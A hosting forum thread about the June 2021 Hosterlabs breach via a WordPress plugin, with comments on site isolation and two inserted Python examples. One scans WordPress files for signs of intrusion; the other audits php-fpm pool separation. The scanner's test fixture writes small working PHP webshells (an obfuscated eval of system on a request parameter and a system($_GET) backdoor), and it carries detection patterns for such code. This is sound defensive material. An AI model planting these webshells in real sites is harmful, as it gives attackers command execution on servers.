Hosterlabs data breach

edited June 2021 in Providers

Just got this email:

We are writing to you because of an incident involving access to information associated with online purchases made on our website www.hosterlabs.net. Although we are unaware of any actual misuse of your information, we are providing notice to you and other potentially affected customers about the incident, and about tools you can use to protect yourself against possible identity theft or fraud.

What Happened?

We discovered on June 22, 2021 that our website www.hosterlabs.net experienced an intrusion on June 21, 2021. The intruder or intruders placed malware on our servers, and by doing so gained access to our customers' data. To date, the investigation indicates that the intrusion began on the 21st of June at around 9 AM.

At first we noticed our website hosterlabs.net/panel/ was offline and not working. Further investigation seemed to reveal a problem with the databases; we thought they were corrupted. After further investigation we found messages from "hackers" threatening to make the information in the databases public or sell it, and they asked us for money in exchange for returning the information, because it had been deleted. We do have backups that we make on a daily basis, and as such we decided not to pay any ransom. We have disaster plans and prevention on all servers and platforms. We have had false alarms of hackings in the past, hence all our systems are extremely secured, but unfortunately there is nothing that cannot be hacked. The hack came through our WordPress main site hosterlabs.net/ where hackers possibly injected viruses through a vulnerability within one or more plugins we have. These vulnerabilities have been fully isolated and fixed. For now security is really tight, but we will add further security in the upcoming days as well as change how our systems are designed internally.

What information was included?

Name, Last Name, E-mail, Address and personally identifiable information.
Passwords were most likely not stolen, nevertheless, please change your passwords for your VPS/Hosting accounts and your control panel account.
No credit card information was stolen, no intrusion in any other systems took place. Please make sure to change your password in all of our services.

Is the breach fixed?

Yes, we have tracked the malware and it has been completely removed from our sites.

What did you do to increase your security?

We have added further firewalls and active monitoring, and we are working as of now with law enforcement to track the perpetrators of the crime. We have notified the FBI and we expect to do forensics on our servers, for which we have backed up all logs and access records.

What kind of security do you have/ how do we know our information was protected?

Your information was protected to the best of our abilities, as we have experience aiding and making sure other people's servers are secure. We have seen/traced/removed similar hackings from customers. Most of our servers are unreachable outside our working spaces and require special authentication. This breach was just exploiting a plugin we had on our WordPress site. We will revise all our security policies and keep you updated.

Thanked by: JasonM, raindog308
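The notice above says the intruders "placed malware on our servers" through a WordPress plugin and that the malware was later tracked and removed. As an added example, not Hosterlabs' tooling and not part of the original post, here is the kind of first-pass triage a responder runs over a WordPress document root: it flags PHP dropped under wp-content/uploads (WordPress never stores executable code there), common obfuscated-eval and request-to-shell patterns, and anything modified after the suspected start of the intrusion (the notice's "21st of June ca. 9 AM", assumed here to be 09:00 UTC). The sample tree it scans is constructed inline; the plugin name, file names and timestamps are made up for the example.

```python
"""Triage scan of a WordPress docroot for artefacts of a plugin-based intrusion.
Added example; not Hosterlabs' tooling. Sample tree is constructed, not real data."""
import os
import re
import shutil
import tempfile
from dataclasses import dataclass

PHP_EXT = (".php", ".php5", ".phtml", ".phar")

# Heuristics for injected PHP: obfuscated eval chains, command execution fed
# straight from request parameters, and the deprecated preg_replace /e modifier.
SUSPICIOUS_PHP = [
    ("obfuscated-eval",
     re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    ("exec-from-request",
     re.compile(rb"(system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    ("preg-replace-e",
     re.compile(rb"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", re.I)),
]

INTRUSION_TS = 1624266000  # 2021-06-21 09:00 UTC; assumed from the notice's "ca. 9 AM"


@dataclass(frozen=True)
class Finding:
    path: str    # path relative to the docroot, forward slashes
    reason: str  # which heuristic fired


def scan_wordpress(root, modified_after=None):
    """Walk a WordPress docroot and return Findings sorted by (path, reason).

    modified_after: optional epoch seconds; files with a newer mtime are reported
    as 'modified-after-intrusion' so the timeline can pivot on the suspected start."""
    findings = []
    uploads = os.path.join(root, "wp-content", "uploads")
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            is_php = name.lower().endswith(PHP_EXT)
            if is_php and full.startswith(uploads + os.sep):
                findings.append(Finding(rel, "php-in-uploads"))
            if is_php:
                with open(full, "rb") as fh:
                    data = fh.read()
                for reason, pattern in SUSPICIOUS_PHP:
                    if pattern.search(data):
                        findings.append(Finding(rel, reason))
            if modified_after is not None and os.stat(full).st_mtime > modified_after:
                findings.append(Finding(rel, "modified-after-intrusion"))
    return sorted(findings, key=lambda f: (f.path, f.reason))


def build_fixture(intrusion_ts):
    """Constructed sample docroot: a clean plugin, a webshell dropped into uploads,
    and a core file backdoored after the intrusion. Returns the temp dir path."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    files = {
        "wp-content/plugins/quiz-maker/quiz-maker.php":
            (b"<?php\n/* Plugin Name: Quiz Maker */\nadd_action('init', 'qm_init');\n", intrusion_ts - 86400),
        "wp-content/uploads/2021/06/cache.php":
            (b"<?php eval(base64_decode('c3lzdGVtKCRfR0VUWydjJ10pOw=='));\n", intrusion_ts + 600),
        "wp-includes/load.php":
            (b"<?php\nif (isset($_GET['x'])) { system($_GET['x']); }\n", intrusion_ts + 1200),
        "wp-content/uploads/2021/06/logo.png":
            (b"\x89PNG\r\n\x1a\n", intrusion_ts - 5000),
    }
    for rel, (content, mtime) in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
        os.utime(full, (mtime, mtime))
    return root


def demo():
    """Build the constructed tree, scan it, clean up; returns (path, reason) pairs."""
    root = build_fixture(INTRUSION_TS)
    try:
        return [(f.path, f.reason) for f in scan_wordpress(root, modified_after=INTRUSION_TS)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{reason:26} {path}")
```

Mtime is a weak signal on its own: attackers can set it back, and a legitimate plugin update after the intrusion also lands in the window, so treat the timeline findings as pivots into the web server access log rather than as verdicts. Anything flagged should be preserved with its timestamps before it is removed, since the notice says forensics are still to come.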

Comments

  • bruh21 (Member, Host Rep)

    :#

  • jsg (Member, Resident Benchmarker)

    At least they make me laugh ...

    Hosterlabs said right on their homepage:
    [Q] Is my data safe?
    [A] Yes.

    Also, though it could be me missing something, I did not find any mention of the data breach on their site.

    Thanked by: NobodyInteresting
  • Razza (Member)
    edited June 2021

    Security-wise it's not the best idea to have WordPress and the billing system on the same vhost.

    If you're going to host them on the same server, for best security have billing hosted on a separate vhost, e.g. a subdomain running as a different PHP user. As long as it's set up properly, if the main site is compromised billing should be fine.

    Thanked by: bdl, feezioxiii, CConner
  • Hosterlabs (Member)
    edited June 2021

    @Razza said:
    Security-wise it's not the best idea to have WordPress and the billing system on the same vhost.

    If you're going to host them on the same server, for best security have billing hosted on a separate vhost, e.g. a subdomain running as a different PHP user. As long as it's set up properly, if the main site is compromised billing should be fine.

    We had planned to deprecate WordPress and use Gatsby in the near future. Again, our apologies.

    P.S. No VM data, server credentials, credit cards or passwords were leaked.

    Thanked by: kkrajk
  • Maounique (Host Rep, Veteran)

    I know many people will come out and say that, when used correctly (patched every day, WP as well as plugins, correct permissions, well isolated, no shady plugins or plugins from shady sources, etc.), WP is safe, but almost everything is safe this way.
    The general idea is to use something with a low attack surface.
    IMO, a flashy (both senses of the word!) site for a host is not really needed, just highlight the packages in a clearly readable form as well as ToS/AUP payment methods and that is about it.
    Using heavy CMS with tons of plugins is probably not a good idea in most situations.

    Thanked by: jsg, MannDude, kalipus
  • seriesn (Member)
    edited June 2021

    And this is why we use HTML for everything minus billing and forum. Better yet, each of them runs on its own server and none talks to the others :)

  • jsg (Member, Resident Benchmarker)

    @seriesn said:
    And this is why we use HTML for everything minus billing and forum. Better yet, each of them runs on its own server and none talks to the others :)

    Yes!

    Btw. HTML5 is damn good enough and when dealing with customer data security should be more important than eye candy.

    One more reason to like NexusBytes / @seriesn.

    Thanked by: seriesn, bdl
  • bdl (Member)

    @Hosterlabs - FYI "Delaware" is misspelled on your main page.

  • Apparently it was a quiz maker plugin for WordPress that was involved in compromising the security...

  • Hxxx (Member)
    edited June 2021

    In my opinion the issue is poor deployment. It's not even WordPress that is the issue; as long as you have WP with a decent WAF like Wordfence you are good to go. But putting this aside, the real problem here is the deployment of the systems and WordPress in the same account.

    As a very useful and also very basic rule, always separate crucial systems from the website. Basically just deploy everything in subdomains or different domains, but that's just step 1. Hosting is so cheap nowadays that I would say NEVER host two things in the same account or vhost. Just changing the way you think about this and applying it... you are making your stuff more secure.

    Step 2) Only host on the same server if you have CageFS (CloudLinux) or an equivalent system that puts some walls around each account and prevents an exploit or a hack from jumping into the other account. In this case it was all deployed in one account, super easy for any attacker to compromise the other system. It is even more secure if you just use different servers for each system; by doing this you are not depending on the CageFS implementation. Just set up different servers and use subdomains (if using the same domain as the website) or just other domains, and create an A record for those servers.

    Step 3) Have a WAF in place and harden the systems. A well-hardened WP using well-implemented plugins is solid... period. Even if you were irresponsible and left the WP with pending updates over a long period, if you have a good WAF (with real-time updates) it will catch and block such attacks. I highly recommend Wordfence, even the free tier. Make sure to configure it properly.

    Let's get it done correctly.

    Cordially / Respectfully

    Thanked by: bdl, kalipus
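Razza's point above (billing on its own vhost, running as a different PHP user) and Hxxx's steps 1 and 2 (separate accounts or CageFS walls, or separate servers) come down to a few checkable properties of the php-fpm pool layout. As an added example, not code from the thread or from any provider, the script below parses pool definitions and reports where two sites would still run PHP under one Unix identity, where a pool listens on TCP so any local process (including a compromised neighbour site) can reach it, and where open_basedir is missing or quietly spans the other site's docroot. The pool files, hostnames and paths are constructed for the example; the php-fpm directive names (user, listen, listen.owner, listen.mode, php_admin_value[open_basedir]) are the real ones.

```python
"""Audit php-fpm pool definitions for per-site isolation.
Added example; not Hosterlabs' or CloudLinux's tooling. Sample configs are constructed."""
import configparser
from dataclasses import dataclass


@dataclass(frozen=True)
class Vhost:
    name: str     # server_name of the vhost
    docroot: str  # its document root
    pool: str     # php-fpm pool section its fastcgi_pass points at


def parse_pools(ini_text):
    """Parse php-fpm pool INI text into {pool_name: {option: value}}."""
    cp = configparser.ConfigParser(
        delimiters=("=",),            # pool files use '=' only; open_basedir values contain ':'
        comment_prefixes=(";", "#"),
        inline_comment_prefixes=(";",),
        interpolation=None,           # '%' is not special in php-fpm files
    )
    cp.read_string(ini_text)
    return {name: dict(cp[name]) for name in cp.sections()}


def _open_basedir_entries(pool):
    raw = pool.get("php_admin_value[open_basedir]", "")
    return [e.rstrip("/") for e in raw.split(":") if e.strip()]


def audit(pools, vhosts):
    """Return sorted (vhost, issue-code) pairs.

    shares-pool / shares-user        two vhosts run PHP as the same Unix identity
    tcp-listen                       pool reachable by any local process, not only the web server
    socket-world-accessible          Unix socket mode grants 'other' bits
    open_basedir-missing             PHP in this pool may read any file its user can
    open_basedir-reaches-other-site  an open_basedir entry covers another vhost's docroot
    """
    issues = set()
    pool_owner, user_owner = {}, {}
    for v in vhosts:
        pool = pools.get(v.pool)
        if pool is None:
            issues.add((v.name, "pool-undefined"))
            continue
        if v.pool in pool_owner:
            issues.add((v.name, "shares-pool"))
        else:
            pool_owner[v.pool] = v.name
            user = pool.get("user")
            if user in user_owner:
                issues.add((v.name, "shares-user"))
            else:
                user_owner[user] = v.name
        listen = pool.get("listen", "")
        if listen and not listen.startswith("/"):
            issues.add((v.name, "tcp-listen"))
        elif int(pool.get("listen.mode", "0660"), 8) & 0o007:  # 0660 is php-fpm's default when unset
            issues.add((v.name, "socket-world-accessible"))
        entries = _open_basedir_entries(pool)
        if not entries:
            issues.add((v.name, "open_basedir-missing"))
        for entry in entries:
            for other in vhosts:
                if other is not v and (other.docroot == entry or other.docroot.startswith(entry + "/")):
                    issues.add((v.name, "open_basedir-reaches-other-site"))
    return sorted(issues)


# Constructed sample configurations. Hostnames and paths are assumptions for the example.
SHARED_INI = """
[www]
user = www-data
group = www-data
listen = 127.0.0.1:9000
pm = dynamic
pm.max_children = 20
"""

SEPARATED_INI = """
[site]
user = site
group = site
listen = /run/php/site.sock
listen.owner = nginx
listen.group = nginx
listen.mode = 0660
php_admin_value[open_basedir] = /var/www/site:/tmp/site
php_admin_value[disable_functions] = exec,passthru,shell_exec,system,popen,proc_open

[billing]
user = billing
group = billing
listen = /run/php/billing.sock
listen.owner = nginx
listen.group = nginx
listen.mode = 0660
php_admin_value[open_basedir] = /var/www/billing:/tmp/billing
"""

# Same users and sockets, but the site pool's open_basedir was widened to the parent
# directory, which re-exposes the billing docroot to code running in the site pool.
LEAKY_INI = SEPARATED_INI.replace("/var/www/site:/tmp/site", "/var/www:/tmp")

SHARED_VHOSTS = [Vhost("www.example.net", "/var/www/site", "www"),
                 Vhost("billing.example.net", "/var/www/billing", "www")]
SEPARATED_VHOSTS = [Vhost("www.example.net", "/var/www/site", "site"),
                    Vhost("billing.example.net", "/var/www/billing", "billing")]


def audit_shared():
    return audit(parse_pools(SHARED_INI), SHARED_VHOSTS)


def audit_separated():
    return audit(parse_pools(SEPARATED_INI), SEPARATED_VHOSTS)


def audit_leaky():
    return audit(parse_pools(LEAKY_INI), SEPARATED_VHOSTS)


if __name__ == "__main__":
    for label, fn in (("shared", audit_shared), ("separated", audit_separated), ("leaky", audit_leaky)):
        print(label, fn())
```

Separate users and sockets stop code running in the WordPress pool from reading the billing application's files and database config directly; they do not cover a shared MySQL account or a world-readable wp-config.php, which need their own checks. Putting the two on different servers, as Hxxx and seriesn suggest, removes this class of audit rather than passing it.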
  • Shit happens.

    Providers need to focus on proactive security measures.

  • kalimov622 (Member)
    edited June 2021

    Giving real details when you sign up with a host makes it even harder with this kind of news. Fortunately you can edit most of them after you place an order and your service is active but some hosts don't allow personal details change at all. That's not really a problem until something like this happens.

  • jsg (Member, Resident Benchmarker)
    edited June 2021

    @Hxxx

    Sorry, no. If a provider feels the need to have WP (or other) machinery driving their eye candy site, they can do so - but on another server that is completely separate.

    The core that holds and deals with customer (and other confidential business) data should be

    • on a separate server and preferably not on a VM
    • split into a back end and a front end with only the latter accessible - in any way - from outside.
    • the front end serving only as interface
    • as minimal as reasonably feasible
    • based on solid statically typed languages and in particular not based on PHP
    • minimalistic in terms of eye candy. HTML 5 offers enough for a decent front end.
    • all focused on stability, safety, reliability, and security.
    • mistrusting both in terms of access and of input (treat any and all input as if coming from adversaries)

    A WP (or similar) based system is pretty much the recipe of how not to do it.

  • @jsg said: .. their eye candy sight, ..

    Pun intended?

    Thanked by: jsg
  • Levi (Member)

    That "FBI" part was hilarious :D

  • @LTniger said:
    That "FBI" part was hilarious :D

  • Hxxx (Member)
    edited June 2021

    @jsg said:
    @Hxxx

    Sorry, no. If a provider feels the need to have WP (or other) machinery driving their eye candy sight, they can do so - but on another server that is completely separate.

    Please read. That's what I said.

  • jsg (Member, Resident Benchmarker)

    @AlwaysSkint said:

    @jsg said: .. their eye candy sight, ..

    Pun intended?

    No, a stupid mistake. Corrected, thank you!

    Thanked by: AlwaysSkint
  • Hxxx (Member)
    edited June 2021

    Also @jsg, WordPress has nothing to do with eye candy shit. You can have a website in plain HTML5 with CSS3, Bootstrap, etc., you know... the usual bullshit, and if you are good you can make it look top notch. People use WordPress just to not mess with HTML or PHP directly; it's just the convenience that a CMS provides.

    Be informed please; you just comment everywhere clueless...

    Respectfully / Cordially.

  • @Hxxx said:
    Also @jsg, WordPress has nothing to do with eye candy shit. You can have a website in plain HTML5 with CSS3, Bootstrap, etc., you know... the usual bullshit, and if you are good you can make it look top notch. People use WordPress just to not mess with HTML or PHP directly; it's just the convenience that a CMS provides.

    Be informed please; you just comment everywhere clueless...

    Respectfully / Cordially.

    You need less Jesus.

    Thanked by: jsg
  • Hxxx (Member)

    @dahartigan said:

    @Hxxx said:
    Also @jsg, WordPress has nothing to do with eye candy shit. You can have a website in plain HTML5 with CSS3, Bootstrap, etc., you know... the usual bullshit, and if you are good you can make it look top notch. People use WordPress just to not mess with HTML or PHP directly; it's just the convenience that a CMS provides.

    Be informed please; you just comment everywhere clueless...

    Respectfully / Cordially.

    You need less Jesus.

    Less LET. Just the same individuals spamming the forum with wrong information.

    Thanked by: TimboJones
  • jsg (Member, Resident Benchmarker)

    @Hxxx said:
    Also @jsg, WordPress has nothing to do with eye candy shit. You can have a website in plain HTML5 with CSS3, Bootstrap, etc., you know... the usual bullshit, and if you are good you can make it look top notch.

    Really? Duh!

    Thanks for confirming my "clueless" view.

    Thanked by: Hxxx, dahartigan
  • Hxxx (Member)

    @jsg You are welcome. Have a nice day.

  • ((shakes head, in disbelief as a disbeliever))
    Where's that Picard meme, when you need it?

    Thanked by: dahartigan
  • yoursunny (Member, IPv6 Advocate)

    @jsg said:
    @Hxxx

    The core that holds and deals with customer (and other confidential business) data should be

    • on a separate server and preferably not on a VM
    • split into a back end and a front end with only the latter accessible - in any way - from outside.
    • the front end serving only as interface
    • as minimal as reasonably feasible
    • based on solid statically typed languages and in particular not based on PHP

    When are you going to develop such a system and make it freely available?
    Actions are louder than words.

    P.S. I made one with bash, not PHP, although it's superseded by Vagrant now.
    https://yoursunny.com/p/vmapi/

    Thanked by: dahartigan
  • jsg (Member, Resident Benchmarker)
    edited June 2021

    @yoursunny said:

    @jsg said:
    @Hxxx

    The core that holds and deals with customer (and other confidential business) data should be

    • on a separate server and preferably not on a VM
    • split into a back end and a front end with only the latter accessible - in any way - from outside.
    • the front end serving only as interface
    • as minimal as reasonably feasible
    • based on solid statically typed languages and in particular not based on PHP

    When are you going to develop such a system and make it freely available?

    When I get paid to do it.

    (see, @AlwaysSkint I'm beginning to get it right, your efforts are not wasted ;) )

  • AlwaysSkint (Member)
    edited June 2021

    LMFTFY

    @jsg said: I'm begging to get it right,

    :p
    Meanwhile, loosely on topic. This is why I keep my games (tablet, Wii/PS3 whatever), phone (no financial transactions) and laptop (web stuff, sites) separate. It's a similar principle.

    Thanked by: yoursunny, dahartigan
  • raindog308 (Administrator, Veteran)

    @Hxxx said: Also @jsg wordpress has nothing to do with eye candy shit. You can have a website in plain HTML5 with CSS3 , bootstrap, etc you know... the usual bullshit and if you are good you can make it look top notch. People use wordpress just to not mess with HTML or PHP directly, just convenience that a CMS provides.

    It's not the CMS convenience as much as the design convenience. Yes, you can make a site look very snazzy without WP...but then you have to hire someone to make you a site or do it yourself. With WP, you can just throw up a template and it looks halfway decent and in the lowend world, that is very attractive.

    An important consideration here is that providers' web sites are greater attack magnets than many other sites, so they need extra care, which argues for the approach @seriesn takes - static HTML, with interactive apps segmented. Heck, if I was a provider my web site would be completely on CDN.

  • @yoursunny said: P.S. I made one with bash, not PHP, although it's superseded by Vagrant now.

    https://yoursunny.com/p/vmapi/

    That looks neat!

    Thanked by: yoursunny
  • @raindog308 said: With WP, you can just throw up a template and it looks halfway decent

    Very true, however the problems come when the average person starts adding these extra (in many cases unnecessary) themes and plugins without understanding the security implications of doing so.

    It doesn't take too long on a fresh WP install until a vulnerable third-party plugin or theme becomes compromised and the account starts sending spam or mining.

    Pure HTML is beautiful simplicity, we don't need dynamic sites (particularly PHP) for every damn thing.
